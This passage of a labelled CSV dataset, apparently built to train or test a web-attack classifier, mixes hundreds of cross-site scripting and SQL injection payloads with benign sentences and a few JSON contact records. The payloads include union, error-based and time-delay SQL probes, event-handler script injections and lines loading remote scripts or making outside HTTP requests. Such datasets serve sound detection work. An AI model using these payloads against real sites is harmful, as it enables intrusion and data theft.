me</h1></div>",1,XSS,576 Select dessert.,3,normal,24497 The Financial Select Sector ETF (XLF) and Industrial Select Sector ETF (XLI) were among the top 5 ETFs in March outflows.,3,normal,25452 Select club.,3,normal,24545 "-1510' ) ) ) union all select 8755,8755,8755,8755,8755,8755,8755,8755,8755,8755--",2,SQLi,15147 "-8758' union all select 6885,6885,6885,6885,6885,6885,6885,6885--",2,SQLi,16722 He'll select the dessert.,3,normal,24466 "In 1757 Voltaire came to reside at Lausanne; and although he took but little notice of the young Englishman of twenty, who eagerly sought and easily obtained an introduction, the establishment of the theatre at Monrepos, where the brilliant versifier himself declaimed before select audiences his own productions on the stage, had no small influence in fortifying Gibbon's taste for the French theatre, and in at the same time abating that ""idolatry for the gigantic genius of Shakespeare which is inculcated from our infancy as the first duty of an Englishman.""",3,normal,26031 "<kbd onmouseout=""alert(1)"">test</kbd>",1,XSS,8698 "1"" ) ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( ( ""zoag"" like ""zoag",2,SQLi,10538 Merge the financial records.,3,normal,22640 "1' ) and make_set ( 4551 = 6487,6487 ) and ( 'jnqa' = 'jnqa",2,SQLi,17256 "\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="""" alt=\'",1,XSS,2250 "select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( ( ( 'lijy' = 'lijy",2,SQLi,15982 "<bdi draggable=""true"" ondrag=""alert(1)"">test</bdi>",1,XSS,5618 It comes as no surprise therefore to see Select launch.,3,normal,25977 "1"" procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 )",2,SQLi,13533 When: Select dates between April 21 and July 29 (see here),3,normal,25142 "1' ) ) as uncy where 8009 = 8009 union all select null,null,null,null,null,null,null,null,null#",2,SQLi,14414 "<style>:target {color: red;}</style><ruby id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></ruby>",1,XSS,999 "1 ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( 5098 = 5098",2,SQLi,12950 "1"" ) as lkzz where 3565 = 3565 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11610 "1"" ) union all select null,null,null,null,null,null,null,null#",2,SQLi,16959 Select undo.,3,normal,24610 1 ) ) as pynj where 7683 = 7683 waitfor delay '0:0:5'--,2,SQLi,17818 "-3979' in boolean mode ) union all select 4911,4911,4911,4911,4911,4911,4911,4911,4911,4911#",2,SQLi,14596 "<canvas onclick=""alert(1)"">test</canvas>",1,XSS,8035 "<style>@keyframes x{}</style><summary style=""animation-name:x"" onanimationstart=""alert(1)""></summary>",1,XSS,1409 "When she does tour, it's usually very little and select.",3,normal,25157 Select the perfect dress for the party.,3,normal,24203 "1 and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 )",2,SQLi,14045 1' ) ) rlike ( select ( case when ( 8489 = 8820 ) then 1 else 0x28 end ) ) and ( ( 'fbjf' = 'fbjf,2,SQLi,14278 "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( ( ( 'opyt' = 'opyt",2,SQLi,13865 Select ship.,3,normal,24701 "1' in boolean mode ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) #",2,SQLi,11804 -8753 ) order by 1#,2,SQLi,21941 "<script src=data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;></script>",1,XSS,695 "1' ) ) ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ( ( 'owga' like 'owga",2,SQLi,10749 "<IMG SRC=x onplaying=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3445 "<;BR SIZE="";&;{alert(';XSS';)}"";>;",1,XSS,9177 <embed id=x tabindex=1 onbeforeactivate=alert(1)></embed>,1,XSS,4177 "1"" ) ) ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( ( ""ynwr"" like ""ynwr",2,SQLi,13868 "1' where 6147 = 6147 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) --",2,SQLi,10482 concatenate,3,normal,23228 "(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'""+(select(0)from(select(sleep(5)))v)+""*/",2,SQLi,13406 "select count ( * ) from generate_series ( 1,5000000 ) and ""%"" = """,2,SQLi,16669 "1' in boolean mode ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) #",2,SQLi,11553 "{""id"":null,""name"":""Liepard""}",3,normal,27125 "<a href=""javascript:x='%27-alert(1)-%27';"">XSS</a>",1,XSS,5499 <input type=image onloadstart=alert(1) src=validimage.png>,1,XSS,3877 <button onfocusout=alert(1) id=x></button><input autofocus>,1,XSS,3628 1' ) where 5214 = 5214,2,SQLi,21453 "1%' ) union all select null,null,null,null,null,null,null,null#",2,SQLi,16853 <button onLayoutComplete=javascript:alert(1)>,1,XSS,6755 "<area draggable=""true"" ondrag=""alert(1)"">test</area>",1,XSS,5113 "1 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,14181 "select * from users where id = '1' union select ( \. ) ,@@VERSION -- 1'",2,SQLi,16036 <sub onblur=alert(1) tabindex=1 id=x></sub><input autofocus>,1,XSS,3557 "( cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select 1 from generate_series ( 9815,9815,case when ( 9815 = 9815 ) then 1 else 0 end ) limit 1 ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) )",2,SQLi,10410 1'|| ( select 'ubza' where 2576 = 2576,2,SQLi,19775 HAVING 1=1#,2,SQLi,22357 "1' ) ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( 'zglq' = 'zglq",2,SQLi,11083 <source onfocusout=alert(1) tabindex=1 id=x></source><input autofocus>,1,XSS,2528 "1"" ) as zjwu where 9963 = 9963 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,15056 "1"" ) ) as nncz where 2331 = 2331",2,SQLi,20368 Select your favorite song.,3,normal,22587 "<div draggable=""true"" contenteditable>drag me</div><meter ondrop=alert(1) contenteditable>drop here</meter>",1,XSS,1170 "1"" rlike ( select ( case when ( 5552 = 1712 ) then 1 else 0x28 end ) )",2,SQLi,16160 "<mark onmousemove=""alert(1)"">test</mark>",1,XSS,7895 "<figcaption oncut=""alert(1)"" contenteditable>test</figcaption>",1,XSS,3151 "call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ""pdqm"" like ""pdqm",2,SQLi,12030 "1%' ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ( '%' = '",2,SQLi,17288 1' where 9003 = 9003 waitfor delay '0:0:5'--,2,SQLi,19146 "1 ) ) ) or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13463 "<style>@keyframes x{}</style><content style=""animation-name:x"" onanimationend=""alert(1)""></content>",1,XSS,1469 "<sup onmouseenter=""alert(1)"">test</sup>",1,XSS,8157 Select lunch.,3,normal,24505 "-6200' ) ) as jjpz where 4490 = 4490 union all select 4490,4490,4490,4490,4490,4490,4490,4490,4490,4490--",2,SQLi,13857 "1 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) # tcrm",2,SQLi,12177 "1'+ ( select lang where 4191 = 4191 union all select null,null#",2,SQLi,16860 They have called for a special prosecutor or select committee.,3,normal,25313 "<thead onkeypress=""alert(1)"" contenteditable>test</thead>",1,XSS,4139 ")) and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,19447 Where's the missing link in the chain?,3,normal,22761 "<blink onkeypress=""alert(1)"" contenteditable>test</blink>",1,XSS,4152 <bgsound onpointerenter=alert(1)>XSS</bgsound>,1,XSS,6470 "1' ) and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,14041 "-6924' ) union all select 2046,2046,2046,2046,2046,2046,2046--",2,SQLi,16987 "<footer onmouseenter=""alert(1)"">test</footer>",1,XSS,6574 "||(SELECT 0x57556971 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||",2,SQLi,15390 Where's the dam?,3,normal,23529 ORDER BY 10--,2,SQLi,22233 1' ) where 7629 = 7629 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,15179 "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( ( ""weku"" like ""weku",2,SQLi,13803 "<div draggable=""true"" contenteditable>drag me</div><output ondragover=alert(1) contenteditable>drop here</output>",1,XSS,869 "{""id"":null,""name"":""cry""}",3,normal,26827 Find records where relevant.,3,normal,23459 "<style>@keyframes slidein {}</style><main style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></main>",1,XSS,404 <script src=http://yoursite.com/your_files.js></script>,1,XSS,4430 <textarea onfocusout=alert(1) id=x></textarea><input autofocus>,1,XSS,3059 "You select a font, timeframe and title, then start writing.",3,normal,25063 `'><script>\x00javascript:alert(1)</script>,1,XSS,7063 "select * from users where id = '1' union select \.,@@VERSION -- 1'",2,SQLi,16572 1 ) as bidc where 5268 = 5268 and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) --,2,SQLi,14887 "1"" ) as wjdc where 8694 = 8694 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --",2,SQLi,10414 "1' ) as eymt where 3911 = 3911 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11371 "1' ) ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( 'ykxz' = 'ykxz",2,SQLi,12236 "<header draggable=""true"" ondragleave=""alert(1)"">test</header>",1,XSS,3319 "1, ( select ( case when ( 7734 = 7734 ) then ( select benchmark ( 5000000,md5 ( 0x72747341 ) ) ) else 7734* ( select 7734 from mysql.db ) end ) )",2,SQLi,12142 <svg><marquee onload=alert(1)></marquee>,1,XSS,7868 "1"" ) ) as qvyu where 5962 = 5962 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) --",2,SQLi,12150 <dd id=x tabindex=1 onfocusin=alert(1)></dd>,1,XSS,6854 select * from users where id = 1 +$ 1 or 1 = 1 -- 1,2,SQLi,18255 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10",2,SQLi,17742 Insert the new SIM card.,3,normal,22756 Some drugmakers last year delayed price hikes on select drugs.,3,normal,25538 "<keygen onmouseover=""alert(1)"">test</keygen>",1,XSS,7000 "By the volume slider for MIDI there will be a "" Select "" check box.",3,normal,26302 "<style>:target {transform: rotate(180deg);}</style><td id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></td>",1,XSS,708 "<noembed onkeydown=""alert(1)"" contenteditable>test</noembed>",1,XSS,3493 "-1434' ) ) union all select 4734,4734,4734,4734,4734,4734,4734,4734,4734,4734#",2,SQLi,15363 "<pre onbeforecopy=""alert(1)"" contenteditable>test</pre>",1,XSS,4575 select ( case when ( 9986 = 8342 ) then 9986 else 9986* ( select 9986 from information_schema.character_sets ) end ) #,2,SQLi,13271 "select count ( * ) from generate_series ( 1,5000000 ) and ( ( 7240 = 7240",2,SQLi,15847 It remains $9 and is only available on select flights.,3,normal,25959 "<IMG SRC="" &#14; javascript:alert('XSS');"">",1,XSS,7057 "<dir onkeyup=""alert(1)"" contenteditable>test</dir>",1,XSS,5582 <time onblur=alert(1) tabindex=1 id=x></time><input autofocus>,1,XSS,3153 <element onpointermove=alert(1)>XSS</element>,1,XSS,6620 "1'+ ( select 'cstd' where 9326 = 9326 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) ) +'",2,SQLi,12015 "<picture oncopy=""alert(1)"" contenteditable>test</picture>",1,XSS,4024 "-9313%"" ) or 5971 = 4572#",2,SQLi,21085 <video onfocusout=alert(1) tabindex=1 id=x></video><input autofocus>,1,XSS,2609 "1%"" ) ) ) and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11654 <dl onpointerdown=alert(1)>XSS</dl>,1,XSS,9121 <hr onpointerout=alert(1)>XSS</hr>,1,XSS,9185 "<a href=""\x10javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2431 ", if is_srvrolemember ( 'sysadmin' ) > 0 waitfor delay '0:0:2' --",2,SQLi,16654 "<IMG SRC=x onpause=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3817 1 ) ) as gocb where 4335 = 4335,2,SQLi,20485 Select pub.,3,normal,24543 1'|| ( select 'zyvk' from dual where 2072 = 2072,2,SQLi,18670 "<div draggable=""true"" contenteditable>drag me</div><plaintext ondrop=alert(1) contenteditable>drop here</plaintext>",1,XSS,837 "1"" where 2072 = 2072 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,13280 or 'x' = 'x,2,SQLi,22406 <menu onpointerup=alert(1)>XSS</menu>,1,XSS,8627 "<div draggable=""true"" contenteditable>drag me</div><rtc ondragover=alert(1) contenteditable>drop here</rtc>",1,XSS,1175 "1 and elt ( 4249 = 4249,7259 )",2,SQLi,20590 "<br SIZE=""&{document.vulnerable=true}"">",1,XSS,8105 "union ( select NULL, NULL, NULL, NULL, NULL, ( select @@version ) ) --",2,SQLi,16141 <iframe// src=javaSCRIPT&colon;alert(1),1,XSS,8101 <legend id=x tabindex=1 onactivate=alert(1)></legend>,1,XSS,4953 1' rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and 'vnkr' like 'vnkr,2,SQLi,15218 "1 union all select null,null,null,null,null,null,null,null,null--",2,SQLi,16658 1 where 7890 = 7890 or sleep ( 5 ) --,2,SQLi,19921 "{""id"":null,""firstName"":""Hong"",""lastName"":""Lee"",""address"":""13 Kian Teck Crescent S()"",""city"":""242"",""telephone"":""3452204844""}",3,normal,27333 1' waitfor delay '0:0:5' and 'jree' = 'jree,2,SQLi,19201 "-8369"" ) ) union all select 2191--",2,SQLi,20136 <button onHashChange=javascript:alert(1)>,1,XSS,7798 "These he cannot remove nor select; and he is bound, in certain circumstances, to listen to their advice, although he is It is said that the general of the Jesuits is independent of the pope; and his popular name, ""the black pope,"" has gone to confirm this idea.",3,normal,25328 "<figure draggable=""true"" ondragenter=""alert(1)"">test</figure>",1,XSS,3409 -1879%' ) ) or 3038 = 3038,2,SQLi,20996 select ( case when ( 3677 = 2193 ) then 3677 else 1/ ( select 0 ) end ) --,2,SQLi,15808 "><iframe src=javascript:alert(XSS)"">",1,XSS,8966 "<div id=""131""><b>drag and drop one of the following strings to the drop box:</b>",1,XSS,1999 "1"" and sleep ( 5 )",2,SQLi,22059 "She asked, ""When is our dinner date?""",3,normal,22930 "<img draggable=""true"" ondrag=""alert(1)"">test</img>",1,XSS,5631 &lt;A HREF=&quot;//www.google.com/&quot;&gt;XSS&lt;/A&gt;,1,XSS,4004 hi' or 1=1 --,2,SQLi,22229 "<sup onbeforecut=""alert(1)"" contenteditable>test</sup>",1,XSS,4755 "If you want your Xbox One to display everything in 4K, select ""4K UHD"" and press A, then select ""Yes"" and press A, and you&aposre all set.",3,normal,26044 "1"" ) ) ) and ( 7396 = 6351 ) *6351 and ( ( ( ""xerw"" like ""xerw",2,SQLi,16980 "<option onkeypress=""alert(1)"" contenteditable>test</option>",1,XSS,3683 "-4091"" ) ) ) union all select 6694,6694--",2,SQLi,19427 "<mark oncontextmenu=""alert(1)"">test</mark>",1,XSS,7451 "-6662"" ) ) union all select 6755--",2,SQLi,20145 "1%' ) ) ) procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,13159 <script language='javascript' src='%(jscript)s'></script>,1,XSS,3987 1' where 9206 = 9206,2,SQLi,21891 "<pre onclick=""alert(1)"">test</pre>",1,XSS,9208 1 and 9122 = 4153# nxcv,2,SQLi,21359 "1"" ) where 7588 = 7588 waitfor delay '0:0:5'--",2,SQLi,18977 "<embed onkeydown=""alert(1)"" contenteditable>test</embed>",1,XSS,4279 "<dialog onkeypress=""alert(1)"" contenteditable>test</dialog>",1,XSS,3668 <pre onpointerenter=alert(1)>XSS</pre>,1,XSS,8415 -9841 where 4612 = 4612 union all select 4612--,2,SQLi,18854 "1' and make_set ( 8403 = 8403,8899 )",2,SQLi,19958 "<a href=""&#0000106avascript:alert(1)"">XSS</a>",1,XSS,6523 "When you select it, you will be given the opportunity to select the color you want to draw with, as usual, but there will be an emoji icon underneath.",3,normal,25148 "1"" ) where 9285 = 9285 and 8506 = 8343#",2,SQLi,19580 "-9725 ) where 9068 = 9068 or elt ( 4723 = 1426,1426 ) --",2,SQLi,17631 "1"" ) where 2758 = 2758 union all select null,null,null,null,null,null,null--",2,SQLi,15488 "1"" and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )",2,SQLi,11855 "1' ) and make_set ( 8403 = 8403,8899 ) and ( 'dhoo' like 'dhoo",2,SQLi,16952 "<style>:target {color:red;}</style><time id=x style=""transition:color 1s"" ontransitionend=alert(1)></time>",1,XSS,1206 "<plaintext onkeydown=""alert(1)"" contenteditable>test</plaintext>",1,XSS,2885 <bdi onpointerdown=alert(1)>XSS</bdi>,1,XSS,8616 <dd onpointerout=alert(1)>XSS</dd>,1,XSS,9260 "<param onmouseenter=""alert(1)"">test</param>",1,XSS,7245 "<figcaption onbeforecut=""alert(1)"" contenteditable>test</figcaption>",1,XSS,2639 1' ) ) as iuta where 1482 = 1482,2,SQLi,20272 Select your fall.,3,normal,25022 ||utl_http.request('httP://192.168.1.1/')||',2,SQLi,19073 select case when 6229 = 2077 then 1 else null end--,2,SQLi,18276 Silk scarves and suit covers are a select part of the Austin Reed collection which also includes check shirt and brushed twill trousers.,3,normal,25556 "<div draggable=""true"" contenteditable>drag me</div><iframe ondragover=alert(1) contenteditable>drop here</iframe>",1,XSS,879 "{""id"":null,""firstName"":""Jonas"",""lastName"":""Lee"",""address"":""45 E Acacia Ct"",""city"":""51"",""telephone"":""5351189998""}",3,normal,27279 "<nextid onkeyup=""alert(1)"" contenteditable>test</nextid>",1,XSS,4381 "1'+ ( select mkbv where 1648 = 1648 and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,11981 random,3,normal,23226 "<slot onbeforepaste=""alert(1)"" contenteditable>test</slot>",1,XSS,3910 "1"" ) ) ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ( ( ""wjhj"" = ""wjhj",2,SQLi,10787 <applet onpointerup=alert(1)>XSS</applet>,1,XSS,7691 "The book will contain four essays, all in French, with the general title of Project of a Universal science, capable of raising our nature to its highest perfection; also Dioptrics, Meteors and Geometry, wherein the most curious matters which the author could select as a proof of the universal science which he proposes are explained in such a way that even the unlearned may understand them.'",3,normal,25483 <button onMouseOver=javascript:alert(1)>,1,XSS,8078 "select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3# kuqm",2,SQLi,14659 "1"" ) ) ) procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,13185 <dfn id=x tabindex=1 onfocusin=alert(1)></dfn>,1,XSS,6481 "<dl onbeforepaste=""alert(1)"" contenteditable>test</dl>",1,XSS,4713 "select sleep ( 5 ) and ( ( ( ""%"" = """,2,SQLi,19953 "1 where 6221 = 6221 and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12500 "<div draggable=""true"" contenteditable>drag me</div><thead ondragover=alert(1) contenteditable>drop here</thead>",1,XSS,991 <u id=x tabindex=1 ondeactivate=alert(1)></u><input id=y autofocus>,1,XSS,2684 1 ) as cwsi where 7360 = 7360 or sleep ( 5 ) #,2,SQLi,18916 "SRC=""javascript:alert('')",1,XSS,9705 -4835 ) ) ) or ( 4219 = 2081 ) *2081 and ( ( ( 8536 = 8536,2,SQLi,17416 "1"" ) ) union all select null--",2,SQLi,20612 "1' where 9156 = 9156 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11220 "<svg><script xlink:href=data:,alert(1) />",1,XSS,7790 -5774' where 3632 = 3632 or ( 3177 = 4222 ) *4222--,2,SQLi,18284 ) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337,2,SQLi,16123 "<article draggable=""true"" ondrag=""alert(1)"">test</article>",1,XSS,3825 "<ol oncontextmenu=""alert(1)"">test</ol>",1,XSS,8449 -3578' ) ) ) order by 1--,2,SQLi,21080 "<u onbeforepaste=""alert(1)"" contenteditable>test</u>",1,XSS,5161 Select your contest.,3,normal,24924 "1' ) ) as popm where 6594 = 6594 union all select null,null#",2,SQLi,17167 "<style>:target {transform: rotate(180deg);}</style><mark id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></mark>",1,XSS,656 "<p onkeypress=""alert(1)"" contenteditable>test</p>",1,XSS,5814 <audio onblur=alert(1) tabindex=1 id=x></audio><input autofocus>,1,XSS,2894 "-7678 ) ) ) union all select 2622,2622,2622,2622,2622,2622,2622,2622--",2,SQLi,16203 Select the device or TV from the available devices list.,3,normal,25601 "<menu oncut=""alert(1)"" contenteditable>test</menu>",1,XSS,5638 <body ontouchstart=alert(1)>,1,XSS,9615 "<command draggable=""true"" ondragenter=""alert(1)"">test</command>",1,XSS,3046 Select your imagine.,3,normal,24981 "<pre onmouseover=""alert(1)"">test</pre>",1,XSS,8448 -4761 order by 1--,2,SQLi,22053 "<textarea ondblclick=""alert(1)"">test</textarea>",1,XSS,6161 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and 'kiex' = 'kiex",2,SQLi,13539 %2b(select*from(select(sleep(5)))a)%2b',2,SQLi,19567 "1' ) where 1625 = 1625 and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12593 "<rtc oncut=""alert(1)"" contenteditable>test</rtc>",1,XSS,6024 &lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;,1,XSS,5094 select ( case when ( 5322 = 6200 ) then 5322 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13593 "1' where 9116 = 9116 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11235 "1' in boolean mode ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) #",2,SQLi,11245 1' ) ) as dipp where 1714 = 1714,2,SQLi,20377 Select your petition.,3,normal,24946 1' where 4253 = 4253,2,SQLi,21871 "-9014%' ) union all select 4211,4211,4211,4211,4211,4211#",2,SQLi,17539 "<meter onbeforecopy=""alert(1)"" contenteditable>test</meter>",1,XSS,3661 "<acronym draggable=""true"" ondragend=""alert(1)"">test</acronym>",1,XSS,3328 <svg><map onload=alert(1)></map>,1,XSS,9468 "1 ) ) and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,15057 "&lt;TABLE&gt;&lt;TD BACKGROUND=\""javascript&#058;alert('XSS')\""&gt;",1,XSS,2665 Check conditions where necessary.,3,normal,23336 "1 and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) -- ixlk",2,SQLi,11697 "{""id"":null,""name"":""Pignite""}",3,normal,27124 <basefont id=x tabindex=1 onbeforedeactivate=alert(1)></basefont><input autofocus>,1,XSS,1929 "1"" ) and 2006 = 2006",2,SQLi,21898 "select * from users where id = 1 * ( 1 ) union select 1,banner from v$version where rownum = 1 -- 1",2,SQLi,14156 Select a background color by clicking on the colored swatch.,3,normal,25669 "<;LINK REL="";stylesheet""; HREF="";http://ha.ckers.org/xss.css"";>;",1,XSS,2882 1'|| ( select 'bhxx' where 2585 = 2585,2,SQLi,19789 select ( case when ( 1724 = 6528 ) then 1724 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13586 <a onpointerup=alert(1)>XSS</a>,1,XSS,9497 waitfor delay '0:0:5' ) +',2,SQLi,20997 between,3,normal,23139 Select the best caterer.,3,normal,24374 1'|| ( select 'pxkz' where 2207 = 2207 and ( 3020 = 3020 ) *6703 ) ||',2,SQLi,16219 "<sup draggable=""true"" ondragstart=""alert(1)"">test</sup>",1,XSS,4622 "<style>:target {color:red;}</style><summary id=x style=""transition:color 1s"" ontransitionend=alert(1)></summary>",1,XSS,944 "In London he seems to have seen but little select society - partly from his father's taste, ""which had always preferred the highest and lowest company,"" and partly from his own reserve and timidity, increased by his foreign education, which had made English habits unfamiliar, and the very language 2 The affair, however, was not finally broken off till 1763.",3,normal,26013 "1' ) or elt ( 6272 = 6272,sleep ( 5 ) )",2,SQLi,19643 You will be able to find out very basic information about a select number of cars by using the free membership.,3,normal,25066 UNION ALL SELECT 'INJ'||'ECT'||'XXX'--,2,SQLi,19665 1'+ ( select lqhd where 4251 = 4251 and ( 8754 = 5779 ) *5779 ) +',2,SQLi,16601 "1 ) as qyic where 9736 = 9736 and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,16546 "<cite onmouseup=""alert(1)"">test</cite>",1,XSS,8371 <map onpointerover=alert(1)>XSS</map>,1,XSS,8630 "1%"" ) ) union all select null,null,null,null,null,null,null,null#",2,SQLi,16716 "1"" ) ) union all select null,null,null,null,null,null#",2,SQLi,17973 "1' ) ) as icik where 1440 = 1440 and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12180 <marquee onpointerdown=alert(1)>XSS</marquee>,1,XSS,6730 select * from users where id = 1 *1 or 1 = 1 -- 1,2,SQLi,18543 """hi"""" ) or ( """"a"""" = """"a""",2,SQLi,21043 "{""id"":null,""firstName"":""Wufu"",""lastName"":""Shi"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27591 1'|| ( select 'xhcr' from dual where 9279 = 9279,2,SQLi,18684 "1"" ) as jask where 7629 = 7629 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --",2,SQLi,12841 "For investors who want to take advantage of Goldman's bullish call, the Communication Services Select Sector SPDR Fund (XLC) tracks the performance of Communication Services Select Sector 